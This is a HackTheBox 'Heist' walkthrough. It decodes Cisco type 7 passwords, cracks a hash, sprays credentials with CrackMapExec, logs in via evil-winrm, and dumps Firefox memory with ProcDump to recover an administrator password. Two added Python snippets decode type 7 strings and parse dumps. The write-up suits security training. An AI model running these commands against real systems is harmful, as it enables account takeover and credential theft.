
Heist was a nice 20 point box created by MinatoTW. It started out with finding a Cisco router config file and cracking some hashes, enumerating more users and then logging in via WinRM to get the user flag. We then dumped the local Firefox processes with ProcDump, used some simple PowerShell for basic process dump analysis, found admin credentials and logged in again via WinRM to get root.
User.txt
Nmap
We start the box with a quick TCP nmap scan:
# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.149 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) &&
nmap -sV -sC -T4 -p$ports 10.10.10.149
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
HTTP
Navigating to http://10.10.10.149/ we come across a login page:

Clicking on ‘Login as guest’ leads us to issues.php which contains the following information:

Checking out the ‘Attachment’ on the first post by Hazard displays a config.txt file for their Cisco router:
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
Hash Cracking
The config.txt file contains the following three hashes:
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
The 7 after password on the bottom two lines indicates that they are Cisco type 7 strings, which are a reversible encoding rather than a hash and can be decoded instantly at Cisco Password Cracker. The results are shown below:


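As an added example (not part of the original writeup), the Python below reproduces what the online cracker does: type 7 is a fixed XOR against a key that has been public for decades, so anyone holding the config recovers the password offline with no wordlist. It also pulls out the enable secret 5 line separately, since that one is md5crypt and needs a real cracker such as john. The config lines are copied from the config.txt above.

```python
import re

# Static XOR key that IOS uses for "password 7" strings. Because it is public,
# type 7 only hides a password from a glance at the screen; it is not encryption.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# The credential lines from the config.txt shown above.
CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits of seed, then hex bytes
    each XORed with the key at position (seed + index) mod len(key)."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded.isalnum():
        raise ValueError("malformed type 7 string")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


def audit_config(text: str) -> dict:
    """Walk an IOS config and return {"type7": {user: plaintext}, "type5": [hashes]}.
    Type 7 entries are recovered on the spot; type 5 ($1$, md5crypt) are only listed."""
    findings = {"type7": {}, "type5": []}
    for line in text.splitlines():
        m = re.match(r"username (\S+) (?:privilege \d+ )?password 7 ([0-9A-Fa-f]+)", line)
        if m:
            findings["type7"][m.group(1)] = decode_type7(m.group(2))
            continue
        m = re.match(r"enable secret 5 (\$1\$\S+)", line)
        if m:
            findings["type5"].append(m.group(1))
    return findings


if __name__ == "__main__":
    result = audit_config(CONFIG)
    for user, password in result["type7"].items():
        print(f"type 7 credential for {user} is recoverable: {password}")
    for h in result["type5"]:
        print(f"type 5 secret needs offline cracking: {h}")
```

The defensive takeaway is that `service password-encryption` buys nothing once a config leaves the device; local accounts should use `secret` rather than `password 7`.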
The $1$pdQG$o8nrSzsGXeaduXrjlvKc91 hash can be cracked quickly with JohnTheRipper:
# john --wordlist=/root/rockyou.txt --rules hash
stealth1agent (?)
Credentials
From what we’ve gathered so far we can create a list of usernames and passwords we’ve found and cracked in the config.txt file:
Hazard / ??? - stealth1agent maybe?
rout3r / $uperP@ssword
admin / Q4)sJu\Y8qz*A3?d
Given that none of these credentials work on the first login screen we encountered on port 80, we can deduce that they are needed elsewhere in order for us to progress.
From our nmap scan we can see that SMB (445) and WinRM (5985) are both open. None of the creds succeeded for WinRM, but hazard / stealth1agent did work for SMB. However, there wasn’t anything of use in any of the shares.
Lookupsid.py
Leveraging the lookupsid.py script from Impacket we’re able to enumerate for more users with Hazard’s SMB credentials.
A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
# python lookupsid.py heist/hazard:stealth1agent@10.10.10.149
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Descriptions of each Impacket script can be found here.
CrackMapExec
As we’ve now got a lot more usernames to work with, we can use CrackMapExec to check if any of the new usernames can be used with the passwords we already possess in order to log into SMB. First we need to create a usernames file:
# cat usernames
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
None
support
Chase
Jason
rout3r
admin
Secondly we create a passwords file with the three cracked passwords inside:
# cat passwords
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d
All we have to do now is run the following CrackMapExec command:

We see Chase / Q4)sJu\Y8qz*A3?d was successful.
Evil-winrm
Since WinRM is open (5985) we can use evil-winrm to log in with these credentials:
# ./evil-winrm.rb -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
Flag
All we have to do now is change directory and we get the user flag.
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt
a127da...
Root.txt
Enumeration
During our usual enumeration we notice there are multiple Firefox processes running:
*Evil-WinRM* PS C:\Users\Chase\desktop> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
1233 68 106768 179916 27.86 2236 1 firefox
343 20 10056 37456 0.55 3164 1 firefox
408 31 17432 61252 2.02 4036 1 firefox
390 30 27464 59848 22.55 4348 1 firefox
358 26 16324 37588 0.47 6256 1 firefox
ProcDump
ProcDump is a tool we can use to dump the Firefox process data.
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It also can serve as a general process dump utility that you can embed in other scripts.
Dumping Firefox Processes
Once you’ve downloaded ProcDump from the link in the previous section, we then need to upload it to Heist like so:
*Evil-WinRM* PS C:\Users\Chase\Documents> upload /root/Downloads/procdump.exe
Info: Uploading /root/Downloads/procdump.exe to .
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
Directory: C:\Users\Chase\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/28/2019 7:13 PM 651424 procdump.exe
With ProcDump successfully uploaded we can dump each Firefox process and then analyse the files for any sensitive information:
*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump.exe -accepteula -ma 6256
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[19:14:54] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_191128_191454.dmp
[19:14:55] Dump 1 writing: Estimated dump file size is 280 MB.
[19:14:59] Dump 1 complete: 280 MB written in 5.0 seconds
[19:15:00] Dump count reached.
Process Dump Analysis
After dumping each process we can then use the PowerShell cmdlet Select-String to ‘grep’ through the dump file for specific words/patterns.
The Select-String cmdlet searches for text and text patterns in input strings and files.
Looking for instances of the string ‘admin’ we get the following information returned:
*Evil-WinRM* PS C:\Users\Chase\Documents> cat firefox.exe_191128_191454.dmp | Select-String -Pattern 'admin'
_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C¨^·(VœàšgÿP÷‚]CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash
Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla
Firefox\firefox.exeMOZ¨^·(VœGgÿGgÿRG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Prog
ram Files\Mozilla Firefox\browser\crashreporter-override.iniNU
Removing all the junk we see a login request made by the admin with their username and password in clear text:
/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ
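An added example (not from the original writeup) that does the same job as the Select-String search above in Python, over a constructed slice of a Firefox dump: Firefox records its own command line in the crash-reporter restart arguments, and here that command line is a login URL carrying the credentials as GET parameters. The code bounds the query string at the first non-printable byte and masks the password when reporting, which is what a triage note should do; note that the trailing `login=` parameter swallows the next environment variable, exactly the junk seen in the raw output.

```python
import re
from urllib.parse import parse_qs

# Constructed stand-in for part of firefox.exe_*.dmp, with junk bytes interleaved
# as they are in a real dump. Values are the ones visible in the writeup above.
DUMP = (
    b"MOZ_CRASHREPORTER_RESTART_ARG_0=C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    b"MOZ\xa8\x5e\xb7\x28\x56\x9c\x47\x67\xff\x47\x67\xffRG_1="
    b"localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login="
    b"MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\\Prog\x00\x00ram Files\\Mozilla Firefox\\browser\\"
    b"crashreporter-override.iniNU\x00 administrator\x00"
)

# Parameter names whose values must never appear unmasked in a report.
SECRET_PARAMS = ("login_password", "password", "passwd", "pwd")

# A query string is a run of printable, non-space ASCII; any other byte terminates it.
QUERY_RE = re.compile(rb"login\.php\?([\x21-\x7e]+)")


def find_login_queries(dump: bytes) -> list[dict]:
    """Locate login.php query strings in raw memory and return their parsed parameters."""
    hits = []
    for m in QUERY_RE.finditer(dump):
        params = parse_qs(m.group(1).decode("ascii"), keep_blank_values=True)
        hits.append({key: values[0] for key, values in params.items()})
    return hits


def report(dump: bytes) -> list[str]:
    """One 'key=value' line per parameter, with secret values replaced by asterisks."""
    lines = []
    for hit in find_login_queries(dump):
        for key, value in hit.items():
            shown = "*" * len(value) if key in SECRET_PARAMS else value
            lines.append(f"{key}={shown}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(DUMP)))
```

The root cause worth recording in the finding is the login form submitting credentials in a GET URL, which leaves them in browser history, command lines and any process dump; switching the form to POST removes them from all three.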
With these credentials we’re able to login via WinRM as Administrator.
# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
Flag
All we have to do now is change directory and we get root.
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
50dfa3...